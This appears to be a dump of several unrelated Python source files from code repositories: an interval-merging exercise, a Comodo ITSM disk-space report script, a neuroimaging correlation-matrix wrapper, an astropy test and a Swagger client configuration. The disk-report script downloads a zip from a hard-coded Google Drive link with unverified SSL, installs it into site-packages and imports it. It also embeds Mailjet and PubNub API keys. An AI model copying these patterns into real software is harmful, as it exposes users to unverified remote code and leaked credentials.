if len(radars) < 1:
return 0
endpoints = []
for end in radars:
endpoints.append([end[0], 0])
endpoints.append([end[1], 1])
endpoints.sort(key = lambda endpoint: endpoint[0])
open_count = 0
last_open = 0
covered = 0
for endpoint in endpoints:
if endpoint[1] == 0:
open_count += 1
if open_count == 1:
last_open = endpoint[0]
else:
open_count -= 1
if open_count == 0:
covered += endpoint[0] - last_open
return covered
''' My solution '''
def cover_the_border_my(l, radars):
    """Return the total covered border length by merging sorted intervals.

    Sorts the intervals by their start point (in place), folds overlapping
    neighbours together via can_merge, and sums the merged lengths.

    l      -- total border length (unused by the algorithm)
    radars -- list of [start, end] intervals
    """
    if len(radars) < 1:
        return 0

    radars.sort(key = lambda radar: radar[0])
    merged = [radars[0]]
    for current in radars[1:]:
        union = [0, 0]
        if can_merge(merged[-1], current, union):
            # Extend the last merged interval in place.
            merged[-1][0] = union[0]
            merged[-1][1] = union[1]
        else:
            merged.append(current)

    return sum(seg[1] - seg[0] for seg in merged)

def can_merge(L1, L2, R):
    """Return True and store the union of L1 and L2 in R if they overlap.

    Precondition: L1[0] <= L2[0].  R is a two-element list used as an
    output parameter; it is only written when the intervals touch/overlap.
    """
    if L1[1] < L2[0]:
        return False
    R[0] = L1[0]
    R[1] = max(L1[1], L2[1])
    return True
# Quick manual check (Python 2 print statement); expected output: 77.
radars = [ [5, 10], [3, 25], [46, 99], [39, 40], [45, 50] ]
print cover_the_border(100, radars)
"[email protected]"
] | |
a181287ab47a20cb7149b2e78d496ed95272cafb | 399dae0b5ad9ca27cde175d25b5435958674eb50 | /Reports/Generate Disk Space Report for Endpoints/generate-disk-space-report-for-endpoints.py | a016efdf31e2323d017285a0679d67edcd5a712e | [] | no_license | kannanch/pythonscripts | 61e3ea9e8ebf6a6b0ec2a4a829664e4507b803ba | 843a522236f9c2cc2aadc68d504c71bb72600bd9 | refs/heads/master | 2020-06-12T11:18:00.404673 | 2019-06-28T11:24:37 | 2019-06-28T11:24:37 | 194,282,297 | 1 | 0 | null | 2019-06-28T13:55:56 | 2019-06-28T13:55:56 | null | UTF-8 | Python | false | false | 15,017 | py | no=xx #Edit the xx parameter as Device Timeout. Eg if you have 500 enrolled endpoints then that xx must "100".
Head_computer=r'CHANGE_ME' # Head computer to send the email
emailto=r'CHANGE_ME' # Email address to send the report
Head_computer=Head_computer.upper()
KI=list(Head_computer)
KI.insert(0,str(no))
import datetime
KI.insert(len(KI),datetime.datetime.now().strftime("%Y%m%d"))
KEY="".join(KI)
import ast
import threading
import time
import os
from subprocess import PIPE, Popen
import ctypes
import shutil
import socket,re
import sys
def Email(fileToSend,To):
    """Send *fileToSend* as a CSV attachment ("Diskreport.csv") to *To*
    using the Mailjet REST API.

    SECURITY NOTE(review): the Mailjet API key/secret are hard-coded below;
    anyone with a copy of this script can send mail through that account.
    """
    from mailjet_rest import Client
    import os
    api_key='3e70858a7a5c5fbc245a662d5d9aa238' # API KEY of Mail Jet
    api_secret= 'a337abcc84d8fb062f6f1597d966ae6f' # API SECRET KEY of Mail Jet
    mailjet = Client(auth=(api_key, api_secret), version='v3.1')
    import base64
    # Attachment content must be base64-encoded for the Mailjet payload.
    with open(fileToSend, 'rb') as fp:
        ki=base64.b64encode(fp.read())
    data = {
        'Messages': [
            {
                "From": {
                    "Email": "[email protected]",
                },
                "To": [
                    {
                        "Email": "%s"%To,
                    }
                ],
                "Subject": "Disk Usage Percentage of all devices ",
                "TextPart": "Dear passenger 1, welcome to Mailjet! May the delivery force be with you!",
                "HTMLPart": """<h3> Hi \n
Please find the attachment which contains all the device reports \n
Thank you.</h3>""",
                "Attachments": [
                    {
                        "ContentType": "text/csv",
                        "Filename": "Diskreport.csv",
                        "Base64Content": "%s"%ki
                    }
                ]
            }
        ]
    }
    result = mailjet.send.create(data=data)
    ret=result.status_code
    # Mailjet returns HTTP 200 with a JSON body describing the delivery;
    # the crude substring check below looks for "success" in that body.
    # NOTE(review): nothing is printed for non-200 responses — confirm that
    # matches the intended original nesting (source indentation was lost).
    if ret==200:
        out=result.json()
        out=str(out)
        if "success" in out:
            print "Email Sent Successfully"
        else:
            print "Error sending email"
def Download(URL, DownloadTo = None, FileName = None):
    """Download *URL* to disk and return the file path, or False on failure.

    FileName defaults to the last path component of the URL; DownloadTo
    defaults to the %TEMP% directory.  (Python 2: uses urllib.urlopen.)
    """
    import urllib
    import ssl
    name = FileName if FileName else URL.split('/')[-1]
    folder = DownloadTo if DownloadTo else os.path.join(os.environ['TEMP'])
    target = os.path.join(folder, name)
    with open(target, 'wb') as out:
        try:
            # First attempt: explicit (unverified) SSL context.
            context = ssl._create_unverified_context()
            out.write(urllib.urlopen(URL,context=context).read())
        except:
            # Fall back to a plain urlopen call if that fails for any reason.
            out.write(urllib.urlopen(URL).read())
    return target if os.path.isfile(target) else False
def zip_item(path, final_path):
    """Extract the ZIP archive at *path* into *final_path* and return it."""
    import zipfile
    with zipfile.ZipFile(path, 'r') as archive:
        archive.extractall(final_path)
    return final_path
def Import_pubnub(DEST):
    """Download a bundled 'PUBNUB.zip' from Google Drive, unpack it into
    %TEMP%, copy the packages into DEST (a site-packages directory), and
    import pubnub to verify the install.  Returns DEST.

    SECURITY NOTE(review): this downloads and executes code from a
    hard-coded Google Drive link with no integrity check.
    """
    BDPATH = Download(r'https://drive.google.com/uc?export=download&id=1R1KFmrC0jh6TOdCFePt2SNTbu_ti_CpP', FileName = 'PUBNUB.zip')
    SRC = os.path.join(os.environ['TEMP'])
    path=zip_item(BDPATH,SRC)
    # The archive extracts into %TEMP%\PUBNUB; copy its contents to DEST.
    SRC = os.path.join(os.environ['TEMP'],'PUBNUB')
    from distutils.dir_util import copy_tree
    copy_tree(SRC, DEST)
    # Import to confirm the packages are now resolvable.
    import pubnub
    from pubnub.pnconfiguration import PNConfiguration
    from pubnub.pubnub import PubNub
    from pubnub.callbacks import SubscribeCallback
    print "Pubnub is imported"
    return DEST
def computername():
    """Return this machine's name from the COMPUTERNAME environment variable."""
    name = os.environ['COMPUTERNAME']
    return name

def ipaddress():
    """Return the IPv4 address that this host's own name resolves to."""
    host = socket.gethostname()
    return socket.gethostbyname(host)
# VBScript source executed via cscript.exe by runvbs(): for every fixed
# drive (FileSystemObject DriveType = 2) it prints one line of the form
# "DRIVE <letter>:<percent free>", which Drive() later parses with a regex.
vbs=r'''
Sub DpySpaceInfo(ByVal infotype, ByVal drvSpace, ByVal percentage)
textline = Space(12 - Len(infotype)) & infotype & Space(17 - Len(drvSpace)) & drvSpace
'If percentage <> "" Then textline = textline & Space(33 - Len(textline)) & percentage
If percentage <> "" Then textline = textline & Space(11 - Len(percentage)) & percentage
WScript.Echo textline
End Sub
' Function to calculate the used and free space on the disk drive.
Sub GetDriveSpace(ByRef drive)
totalSpace = drive.TotalSize / 1024
freeSpace = drive.AvailableSpace / 1024
percentFree = freeSpace / totalSpace
percentUsed = 1 - percentFree
dpyUsedSpace = FormatNumber(totalSpace - freeSpace, 0, vbTrue, vbFalse, vbTrue) & " KB"
dpyFreeSpace = FormatNumber(freeSpace, 0, vbTrue, vbFalse, vbTrue) & " KB"
dpyTotalSpace = FormatNumber(totalSpace, 0, vbTrue, vbFalse, vbTrue) & " KB"
dpyPercentUsed = FormatPercent(percentUsed, 2, vbTrue, vbFalse, vbTrue)
dpyPercentFree = FormatPercent(percentFree, 2, vbTrue, vbFalse, vbTrue)
WScript.Echo "DRIVE " & drive.DriveLetter & ":" &dpyPercentFree
End Sub
Set oFileSystem = CreateObject("Scripting.FileSystemObject")
Set drivesList = oFileSystem.Drives
' Iterage through all drives ignoring all but fixed drives.
For Each d In drivesList
If d.DriveType = 2 Then GetDriveSpace d
Next
'''
class disable_file_system_redirection:
    """Context manager that temporarily disables WOW64 file-system
    redirection so a 32-bit Python on 64-bit Windows can reach the real
    System32 (e.g. to run cscript.exe / taskkill).  Windows-only.
    """
    _disable = ctypes.windll.kernel32.Wow64DisableWow64FsRedirection
    _revert = ctypes.windll.kernel32.Wow64RevertWow64FsRedirection
    def __enter__(self):
        # old_value receives the previous redirection state for __exit__.
        self.old_value = ctypes.c_long()
        self.success = self._disable(ctypes.byref(self.old_value))
    def __exit__(self, type, value, traceback):
        # Only restore if disabling actually succeeded.
        if self.success:
            self._revert(self.old_value)
def runvbs(vbs):
    """Write *vbs* to %PROGRAMDATA%\\temp\\temprun.vbs, run it with
    cscript.exe (file-system redirection disabled), delete the temp file,
    and return cscript's stdout as a string.
    """
    workdir=os.environ['PROGRAMDATA']+r'\temp'
    if not os.path.isdir(workdir):
        os.mkdir(workdir)
    with open(workdir+r'\temprun.vbs',"w") as f :
        f.write(vbs)
    with disable_file_system_redirection():
        # os.popen blocks until cscript finishes and captures its output.
        Percentage=os.popen('cscript.exe "'+workdir+r'\temprun.vbs"').read()
    if os.path.isfile(workdir+r'\temprun.vbs'):
        os.remove(workdir+r'\temprun.vbs')
    return Percentage
def Drive(KEY):
    """Build this endpoint's report row as a flat list.

    Layout (interleaved via the insert loops below): KEY, computer name,
    IP address, then per fixed drive: drive letter, total, used, free
    (human-readable), usage percentage, and a "\n"+"," separator so the
    head computer can write the list straight into a CSV file.
    """
    SAM=[]
    per=[]
    # Run the VBScript to get the free-space percentage per drive.
    percent=runvbs(vbs)
    SAM.append(KEY)
    SAM.append(computername())
    SAM.append(ipaddress())
    # Each output line looks like "DRIVE C:37.50%"; extract the number and
    # convert "percent free" into "percent used".
    freepercent=re.findall('DRIVE (.*)',percent)
    for val in freepercent:
        val1=re.sub(r":(.*)", "", val)
        val=re.sub(r"(.*):", "", val)
        val=re.sub(r"%", "", val)
        val=float(val)
        freepercentage=100-val
        per.append(str(freepercentage))
    # List the fixed drives (DriveType=3) via WMIC; first token is "Name".
    drive=os.popen('wmic logicaldisk WHERE DriveType=3 get name').read()
    list_of_drives=drive.split()[1:]
    def disk_usage(path):
        # Query total/free bytes for a drive with GetDiskFreeSpaceEx;
        # returns [total, used, free].
        _, total, free = ctypes.c_ulonglong(), ctypes.c_ulonglong(), \
            ctypes.c_ulonglong()
        if sys.version_info >= (3,) or isinstance(path, unicode):
            fun = ctypes.windll.kernel32.GetDiskFreeSpaceExW
        else:
            fun = ctypes.windll.kernel32.GetDiskFreeSpaceExA
        ret = fun(path, ctypes.byref(_), ctypes.byref(total), ctypes.byref(free))
        if ret == 0:
            raise ctypes.WinError()
        used = total.value - free.value
        return [total.value, used, free.value]
    def bytes2human(n):
        # Format a byte count as e.g. "9.8GB"; values < 1KB pass through.
        symbols = ('KB', 'MB', 'GB', 'TB', 'PB', 'EB', 'ZB', 'YB')
        prefix = {}
        for i, s in enumerate(symbols):
            prefix[s] = 1 << (i+1)*10
        for s in reversed(symbols):
            if n >= prefix[s]:
                value = float(n) / prefix[s]
                return '%.1f%s' % (value, s)
        return n
    k=[disk_usage(i) for i in list_of_drives]
    fnl=[]
    for i in k:
        for j in i:
            SAM.append(bytes2human(j))
    # Interleave the drive letters (every 4th slot starting at index 3)...
    j=3
    for i in list_of_drives:
        SAM.insert(j,i)
        j=j+4
    # ...then the usage percentages (every 5th slot starting at index 7).
    j=7
    for i in per:
        SAM.insert(j,i)
        j=j+5
    print SAM
    # Finally add newline+comma separators after each drive group.
    # NOTE(review): the index arithmetic assumes the VBScript and WMIC
    # report the same drives in the same order — verify on multi-drive hosts.
    if len(SAM)>=8:
        j=8
        for i in per:
            SAM.insert(j,"\n"+",")
            j=j+6
    else:
        j=8
        SAM.insert(j,"\n")
    return SAM
# CSV header row written by the head computer (the drive columns repeat for each drive).
list_head=['Computer_Name', 'IP_Address',"Drive_name","Total_Space","Used_Space","Free_Space","Percentage_of_usage"]
def publish_nonhead():
    """Non-head endpoints: wait 30s (to let the head computer start
    listening), then publish this machine's Drive(KEY) report to the
    shared PubNub channel.
    """
    import time
    time.sleep(30)
    from pubnub.pnconfiguration import PNConfiguration
    from pubnub.pubnub import PubNub
    from pubnub.callbacks import SubscribeCallback
    from pubnub.pnconfiguration import PNConfiguration
    from pubnub.pubnub import PubNub
    # Shared PubNub keyset used by all endpoints of this script.
    publish_key1= 'pub-c-7a797a24-388e-411c-b848-9bd170919784'
    subscribe_key1= 'sub-c-b1b31f80-179a-11e8-95aa-1eb18890f15d'
    pnconfig = PNConfiguration()
    pnconfig.subscribe_key = subscribe_key1
    pnconfig.publish_key = publish_key1
    pnconfig.ssl = True
    pubnub = PubNub(pnconfig)
    import time
    from pubnub.exceptions import PubNubException
    try:
        # .sync() blocks until the publish completes (or raises).
        envelope = pubnub.publish().channel("Channel-706fxzjkv").message(Drive(KEY)).sync()
        print("publish timetoken: %d" % envelope.result.timetoken)
    except PubNubException as e:
        print e
def publish(no):
    """Head computer: after sleeping 3*no seconds (the device timeout, so
    all endpoints have published), publish the head's own Drive(KEY) row,
    email the collected report, and then kill this process with taskkill
    to break out of the listener's endless loop.
    """
    import pubnub
    from pubnub.pnconfiguration import PNConfiguration
    from pubnub.pubnub import PubNub
    from pubnub.callbacks import SubscribeCallback
    from pubnub.pnconfiguration import PNConfiguration
    from pubnub.pubnub import PubNub
    publish_key1= 'pub-c-7a797a24-388e-411c-b848-9bd170919784'
    subscribe_key1= 'sub-c-b1b31f80-179a-11e8-95aa-1eb18890f15d'
    pnconfig = PNConfiguration()
    pnconfig.subscribe_key = subscribe_key1
    pnconfig.publish_key = publish_key1
    pnconfig.ssl = True
    pubnub = PubNub(pnconfig)
    import time
    # Wait long enough for every endpoint to have published its row.
    s=3*no
    time.sleep(s)
    from pubnub.exceptions import PubNubException
    try:
        envelope = pubnub.publish().channel("Channel-706fxzjkv").message(Drive(KEY)).sync()
        print("publish timetoken: %d" % envelope.result.timetoken)
        app_process=os.getpid()
        app_process=str(app_process)
        import subprocess;
        import ctypes
        class disable_file_system_redirection:
            # Local copy of the WOW64 redirection guard (see module-level class).
            _disable = ctypes.windll.kernel32.Wow64DisableWow64FsRedirection
            _revert = ctypes.windll.kernel32.Wow64RevertWow64FsRedirection
            def __enter__(self):
                self.old_value = ctypes.c_long()
                self.success = self._disable(ctypes.byref(self.old_value))
            def __exit__(self, type, value, traceback):
                if self.success:
                    self._revert(self.old_value)
        time.sleep(5)
        reportfolder=os.path.join(os.environ['ProgramData'],"new.csv")
        Email(reportfolder,emailto)
        print "Your file is in head computer at "+reportfolder
        # Forcefully terminate this very process; the subscribe loop in
        # LongFunctionInside.long_function never exits on its own.
        with disable_file_system_redirection():
            process=subprocess.Popen(['taskkill', '/F','/PID',app_process],shell=True,stdout=subprocess.PIPE);
            result=process.communicate()[0]
            print (result)
    except PubNubException as e:
        print e
class LongFunctionInside(object):
    """Head-computer role: subscribe to the PubNub channel, write the CSV
    header, and append every row whose first element matches today's KEY.
    A daemon timer thread (work_time) eventually calls publish(), which
    emails the report and kills the process.
    """
    lock_state = threading.Lock()
    working = False

    def long_function(self, timeout,no):
        # Start the timeout thread that will publish the head's own row
        # and terminate the process once the collection window is over.
        self.working = True
        timeout_work = threading.Thread(name="thread_name", target=self.work_time, args=(timeout,))
        timeout_work.setDaemon(True)
        timeout_work.start()
        import logging
        import pubnub
        from pubnub.exceptions import PubNubException
        from pubnub.pnconfiguration import PNConfiguration
        from pubnub.pubnub import PubNub, SubscribeListener
        import time
        import os
        pnconfig = PNConfiguration()
        pnconfig.subscribe_key = 'sub-c-b1b31f80-179a-11e8-95aa-1eb18890f15d'
        pnconfig.publish_key = ''
        pubnub = PubNub(pnconfig)
        n=0
        my_listener = SubscribeListener()
        pubnub.subscribe().channels('Channel-706fxzjkv').execute()
        # Create the report file and write the CSV header row.
        fp=os.path.join(os.environ['ProgramData'],"new.csv")
        sample=''
        for i in list_head:
            if i == None:
                sample=sample+"None"+","
            else:
                sample=sample+i+","
        with open(fp,'w') as f:
            f.write(sample)
            f.write('\n')
        while True:
            print "Listening..."# endless/long work
            pubnub.add_listener(my_listener)
            result = my_listener.wait_for_message_on('Channel-706fxzjkv')
            pubnub.remove_listener(my_listener)
            result=result.message
            print result[0]
            sample=""
            # Only accept rows that carry today's session KEY (element 0);
            # the remaining elements are appended verbatim as CSV cells.
            if(result[0]==KEY):
                with open(fp,'a+') as f:
                    for i in range(1,len(result)):
                        if result[i] == None:
                            sample=sample+"None"+","
                        else:
                            sample=sample+result[i]+","
                    f.write(sample)
                    f.write('\n')
            if not self.working: # if state is working == true still working
                break
            self.set_state(True)

    def work_time(self, sleep_time):
        # Timer thread: sleep, then hand over to publish() (uses global 'no').
        print sleep_time# thread function that just sleeping specified time,
        time.sleep(sleep_time)
        if self.working:
            publish(no)
            self.set_state(False)

    def set_state(self, state): # secured state change
        # Update self.working under the lock.
        while True:
            self.lock_state.acquire()
            try:
                self.working = state
                break
            finally:
                self.lock_state.release()
# Pick the program-files root (64-bit Windows has "Program Files (x86)").
HOMEPATH = r"C:\Program Files (x86)"
if os.path.exists(HOMEPATH):
    HOMEPATH = r"C:\Program Files (x86)"
else:
    HOMEPATH =r"C:\Program Files"

# Remove any report left over from a previous run.
fp=os.path.join(os.environ['ProgramData'],"new.csv")
if os.path.exists(fp):
    try:
        os.remove(fp)
    except:
        pass

# Check whether the pubnub dependency bundle is already installed in the
# Comodo ITSM site-packages; if fewer than all expected folders are present,
# download and install it via Import_pubnub().
DEST= os.path.join(HOMEPATH,r'COMODO\Comodo ITSM\Lib\site-packages')
Folders=os.listdir(DEST)
Nodow=0
Del_folders=['certifi', 'certifi-2018.1.18.dist-info','chardet', 'chardet-3.0.4.dist-info', 'Cryptodome', 'pubnub', 'pubnub-4.0.13.dist-info', 'pycryptodomex-3.4.12.dist-info','requests']
for i in Del_folders:
    if i in Folders:
        Nodow=Nodow+1
if Nodow>7:
    c=0
else:
    DEST=Import_pubnub(DEST)

# Role dispatch: the head computer collects and emails the report,
# every other endpoint just publishes its own row.
computer=os.environ['computername']
import os
if computer==Head_computer :
    lw = LongFunctionInside()
    lw.long_function(0.1,no)
else:
    publish_nonhead()
| [
"[email protected]"
] | |
171eaf38d54a5fe7dcf2a23a97cf6c845c890e8d | cff5ac961d717059caf25dc4247ddcc958f27d24 | /WRAPPERS/corrmat_from_regionalmeasures.py | 1be8e37d8ef4eb4850aaa0156d84101d217d6c98 | [
"MIT"
] | permissive | repropaper/NSPN_WhitakerVertes_PNAS2016 | fac4a9bb72e92db2d38b5c41e431e998c8114030 | 5c9c46caf91768d4cadec2b24078b640f05d3d76 | refs/heads/reprobranch | 2020-03-19T00:17:24.346727 | 2017-02-23T08:24:50 | 2017-02-23T08:24:50 | 135,469,739 | 0 | 1 | MIT | 2018-05-30T17:08:00 | 2018-05-30T16:26:32 | OpenEdge ABL | UTF-8 | Python | false | false | 6,687 | py | #!/usr/bin/env python
#=============================================================================
# Created by Kirstie Whitaker
# at Hot Numbers coffee shop on Trumpington Road in Cambridge, September 2016
# Contact: [email protected]
#=============================================================================
#=============================================================================
# IMPORTS
#=============================================================================
import os
import sys
import argparse
import textwrap
import numpy as np
import pandas as pd
sys.path.append(os.path.join(os.path.dirname(__file__), '../SCRIPTS/'))
import make_corr_matrices as mcm
#=============================================================================
# FUNCTIONS
#=============================================================================
def setup_argparser():
    '''
    Build the command line interface for this script.

    Returns a tuple (arguments, parser): the parsed argument namespace and
    the ArgumentParser itself (so callers can print usage if needed).
    '''
    description = ('Generate a structural correlation matrix from an input csv file,\n'
                   'a list of region names and (optional) covariates.')
    sign_off = 'Author: Kirstie Whitaker <[email protected]>'

    p = argparse.ArgumentParser(description=description,
                                epilog=sign_off,
                                formatter_class=argparse.RawTextHelpFormatter)

    # Positional arguments (order matters for the command line).
    p.add_argument(dest='regional_measures_file',
                   type=str,
                   metavar='regional_measures_file',
                   help=('CSV file that contains regional values for each participant.\n'
                         'Column labels should be the region names or covariate variable\n'
                         'names. All participants in the file will be included in the\n'
                         'correlation matrix.'))

    p.add_argument(dest='names_file',
                   type=str,
                   metavar='names_file',
                   help=('Text file that contains the names of each region to be included\n'
                         'in the correlation matrix. One region name on each line.'))

    p.add_argument(dest='output_name',
                   type=str,
                   metavar='output_name',
                   help=('File name of the output correlation matrix.\n'
                         'If the output directory does not yet exist it will be created.'))

    # Optional arguments.
    p.add_argument('--covars_file',
                   type=str,
                   metavar='covars_file',
                   help=('Text file that contains the names of variables that should be\n'
                         'covaried for each regional measure before the creation of the\n'
                         'correlation matrix. One variable name on each line.\n'
                         ' Default: None'),
                   default=None)

    p.add_argument('--names_308_style',
                   action='store_true',
                   help=('Include this flag if your names are in the NSPN 308\n'
                         'parcellation style (which means you have 41 subcortical regions)\n'
                         'that are still in the names files and that\n'
                         'the names are in <hemi>_<DK-region>_<part> format.\n'
                         ' Default: False'),
                   default=False)

    arguments = p.parse_args()

    return arguments, p
def read_in_data(regional_measures_file, names_file, covars_file=None, names_308_style=True):
    '''
    Read in the data from the three input files:
      * regional_measures_file : CSV read into a pandas DataFrame
      * names_file             : one region name per line
      * covars_file            : one covariate name per line (optional)

    If the names are in 308 style then drop the first 41 entries (the
    subcortical regions) from the names list and strip a trailing
    "_thickness" suffix from the DataFrame column labels.

    Returns a tuple (df, names, covars_list).
    '''
    df = pd.read_csv(regional_measures_file)

    # Use context managers so the file handles are closed promptly
    # (previously the files were opened without `with` and left to the
    # garbage collector).
    with open(names_file) as f:
        names = [line.strip() for line in f]

    if covars_file:
        with open(covars_file) as f:
            covars_list = [line.strip() for line in f]
    else:
        covars_list = []

    if names_308_style:
        # Drop the 41 subcortical regions and remove the "_thickness"
        # suffix that FreeSurfer appends to the column names.
        names = names[41:]
        df.columns = [col.rsplit('_thickness', 1)[0] for col in df.columns]

    return df, names, covars_list
def corrmat_from_regionalmeasures(regional_measures_file,
                                  names_file,
                                  covars_file,
                                  output_name,
                                  names_308_style=False):
    '''
    Build a structural correlation matrix and save it as a text file.

    Reads the participant-by-region CSV file, the region names file and
    the covariates file, corrects each regional measure for the listed
    covariates, computes the region-by-region correlation matrix and
    writes it to ``output_name`` (the output directory is created by the
    save routine if it does not yet exist).
    '''
    # Load everything we need from disk.
    df, names, covars_list = read_in_data(
        regional_measures_file,
        names_file,
        covars_file=covars_file,
        names_308_style=names_308_style)

    # Correlate the regional measures, correcting for all covariates,
    # then write the resulting matrix out.
    corrmat = mcm.create_corrmat(df, names, covars_list)
    mcm.save_mat(corrmat, output_name)
if __name__ == "__main__":
    # Parse the command line arguments and hand them straight on to the
    # main function.
    arguments, parser = setup_argparser()

    corrmat_from_regionalmeasures(arguments.regional_measures_file,
                                  arguments.names_file,
                                  arguments.covars_file,
                                  arguments.output_name,
                                  names_308_style=arguments.names_308_style)

#=============================================================================
# Wooo! All done :)
#=============================================================================
| [
"[email protected]"
] | |
a0264de9f564b1eddb8d60d387ccf898539bcc2f | c544a5c24b4adedd2c1602894acf5dcafe64ed6f | /astropy_helpers/tests/test_utils.py | ad76e4f5b54a24cc076aaa835620bb1827d6aac3 | [] | permissive | astropy/astropy-helpers | b6053f673f517e11ccf243d1ffe1e685b9b8ebe7 | 3b45ed3191ceb45c574db304ec0f33282d2e4a98 | refs/heads/master | 2023-08-20T04:51:42.767065 | 2022-05-25T16:38:43 | 2022-05-25T16:38:43 | 14,448,779 | 30 | 40 | BSD-3-Clause | 2022-05-25T16:36:17 | 2013-11-16T15:01:42 | Python | UTF-8 | Python | false | false | 751 | py | import os
from ..utils import find_data_files
def test_find_data_files(tmpdir):
    """find_data_files should locate matching files in nested sub-directories."""
    root = tmpdir.mkdir('data')
    sub1 = root.mkdir('sub1')
    sub2 = root.mkdir('sub2')
    sub3 = sub1.mkdir('sub3')

    # Drop one 'data.dat' file into every directory of the tree.
    for directory in (root, sub1, sub2, sub3):
        path = directory.join('data.dat').strpath
        with open(path, 'w') as handle:
            handle.write('test')

    found = find_data_files(root.strpath, '**/*.dat')
    relative = sorted(os.path.relpath(name, root.strpath) for name in found)

    assert relative[0] == os.path.join('data.dat')
    assert relative[1] == os.path.join('sub1', 'data.dat')
    assert relative[2] == os.path.join('sub1', 'sub3', 'data.dat')
    assert relative[3] == os.path.join('sub2', 'data.dat')
| [
"[email protected]"
] | |
228b3233ec8da4230a696814daf44cbb9a316673 | 6657a43ee360177e578f67cf966e6aef5debda3c | /varsom_avalanche_client/configuration.py | 4f8c074c8e547f5533c6988b72af1a1db6d5d8c1 | [
"MIT"
] | permissive | NVE/python-varsom-avalanche-client | 3cc8b9c366f566a99c6f309ccdfb477f73256659 | c7787bf070d8ea91efd3a2a9e7782eedd4961528 | refs/heads/master | 2022-04-20T09:32:24.499284 | 2020-04-16T20:12:01 | 2020-04-16T20:12:01 | 256,318,660 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,046 | py | # coding: utf-8
"""
Snøskredvarsel API
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen) # noqa: E501
OpenAPI spec version: v5.0.1
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import copy
import logging
import multiprocessing
import sys
import urllib3
import six
from six.moves import http_client as httplib
class TypeWithDefault(type):
    """Metaclass that makes instantiation return a shallow copy of a
    lazily created, per-class default instance.

    Calling the class returns ``copy.copy`` of a singleton default, which
    is built on first use and can be replaced via ``set_default``.
    """

    def __init__(cls, name, bases, dct):
        super(TypeWithDefault, cls).__init__(name, bases, dct)
        cls._default = None

    def __call__(cls):
        if cls._default is None:
            # Lazily build the shared default instance on first call.
            cls._default = type.__call__(cls)
        return copy.copy(cls._default)

    def set_default(cls, default):
        # Store a copy so later mutations of ``default`` do not leak into
        # instances handed out afterwards.
        cls._default = copy.copy(default)
class Configuration(six.with_metaclass(TypeWithDefault, object)):
    """NOTE: This class is auto generated by the swagger code generator program.

    Ref: https://github.com/swagger-api/swagger-codegen
    Do not edit the class manually.

    Holds connection, authentication, logging and TLS settings for the
    generated API client.  Because of the ``TypeWithDefault`` metaclass,
    ``Configuration()`` returns a copy of a shared default instance.
    """

    def __init__(self):
        """Constructor"""
        # Default Base url
        self.host = "https://api01.nve.no/hydrology/forecast/avalanche/v5.0.1"
        # Temp file folder for downloading files
        self.temp_folder_path = None

        # Authentication Settings
        # dict to store API key(s)
        self.api_key = {}
        # dict to store API prefix (e.g. Bearer)
        self.api_key_prefix = {}
        # function to refresh API key if expired
        self.refresh_api_key_hook = None
        # Username for HTTP basic authentication
        self.username = ""
        # Password for HTTP basic authentication
        self.password = ""

        # Logging Settings
        self.logger = {}
        self.logger["package_logger"] = logging.getLogger("varsom_avalanche_client")
        self.logger["urllib3_logger"] = logging.getLogger("urllib3")
        # Log format.  NOTE: assigning here runs the logger_format property
        # setter below, which also creates self.logger_formatter.
        self.logger_format = '%(asctime)s %(levelname)s %(message)s'
        # Log stream handler
        self.logger_stream_handler = None
        # Log file handler
        self.logger_file_handler = None
        # Debug file location.  Assigning runs the logger_file property
        # setter, which installs a stream handler (no file configured yet).
        self.logger_file = None
        # Debug switch (property setter adjusts log levels)
        self.debug = False

        # SSL/TLS verification
        # Set this to false to skip verifying SSL certificate when calling API
        # from https server.
        self.verify_ssl = True
        # Set this to customize the certificate file to verify the peer.
        self.ssl_ca_cert = None
        # client certificate file
        self.cert_file = None
        # client key file
        self.key_file = None
        # Set this to True/False to enable/disable SSL hostname verification.
        self.assert_hostname = None

        # urllib3 connection pool's maximum number of connections saved
        # per pool. urllib3 uses 1 connection as default value, but this is
        # not the best value when you are making a lot of possibly parallel
        # requests to the same host, which is often the case here.
        # cpu_count * 5 is used as default value to increase performance.
        self.connection_pool_maxsize = multiprocessing.cpu_count() * 5

        # Proxy URL
        self.proxy = None
        # Safe chars for path_param
        self.safe_chars_for_path_param = ''

    @property
    def logger_file(self):
        """The logger file.

        If the logger_file is None, then add stream handler and remove file
        handler. Otherwise, add file handler and remove stream handler.

        :param value: The logger_file path.
        :type: str
        """
        return self.__logger_file

    @logger_file.setter
    def logger_file(self, value):
        """The logger file.

        If the logger_file is None, then add stream handler and remove file
        handler. Otherwise, add file handler and remove stream handler.

        :param value: The logger_file path.
        :type: str
        """
        self.__logger_file = value
        if self.__logger_file:
            # If set logging file,
            # then add file handler and remove stream handler.
            self.logger_file_handler = logging.FileHandler(self.__logger_file)
            self.logger_file_handler.setFormatter(self.logger_formatter)
            for _, logger in six.iteritems(self.logger):
                logger.addHandler(self.logger_file_handler)
                if self.logger_stream_handler:
                    logger.removeHandler(self.logger_stream_handler)
        else:
            # If not set logging file,
            # then add stream handler and remove file handler.
            self.logger_stream_handler = logging.StreamHandler()
            self.logger_stream_handler.setFormatter(self.logger_formatter)
            for _, logger in six.iteritems(self.logger):
                logger.addHandler(self.logger_stream_handler)
                if self.logger_file_handler:
                    logger.removeHandler(self.logger_file_handler)

    @property
    def debug(self):
        """Debug status

        :param value: The debug status, True or False.
        :type: bool
        """
        return self.__debug

    @debug.setter
    def debug(self, value):
        """Debug status

        :param value: The debug status, True or False.
        :type: bool
        """
        self.__debug = value
        if self.__debug:
            # if debug status is True, turn on debug logging
            for _, logger in six.iteritems(self.logger):
                logger.setLevel(logging.DEBUG)
            # turn on httplib debug
            httplib.HTTPConnection.debuglevel = 1
        else:
            # if debug status is False, turn off debug logging,
            # setting log level to default `logging.WARNING`
            for _, logger in six.iteritems(self.logger):
                logger.setLevel(logging.WARNING)
            # turn off httplib debug
            httplib.HTTPConnection.debuglevel = 0

    @property
    def logger_format(self):
        """The logger format.

        The logger_formatter will be updated when sets logger_format.

        :param value: The format string.
        :type: str
        """
        return self.__logger_format

    @logger_format.setter
    def logger_format(self, value):
        """The logger format.

        The logger_formatter will be updated when sets logger_format.

        :param value: The format string.
        :type: str
        """
        self.__logger_format = value
        self.logger_formatter = logging.Formatter(self.__logger_format)

    def get_api_key_with_prefix(self, identifier):
        """Gets API key (with prefix if set).

        Returns None implicitly when no key is stored for `identifier`.

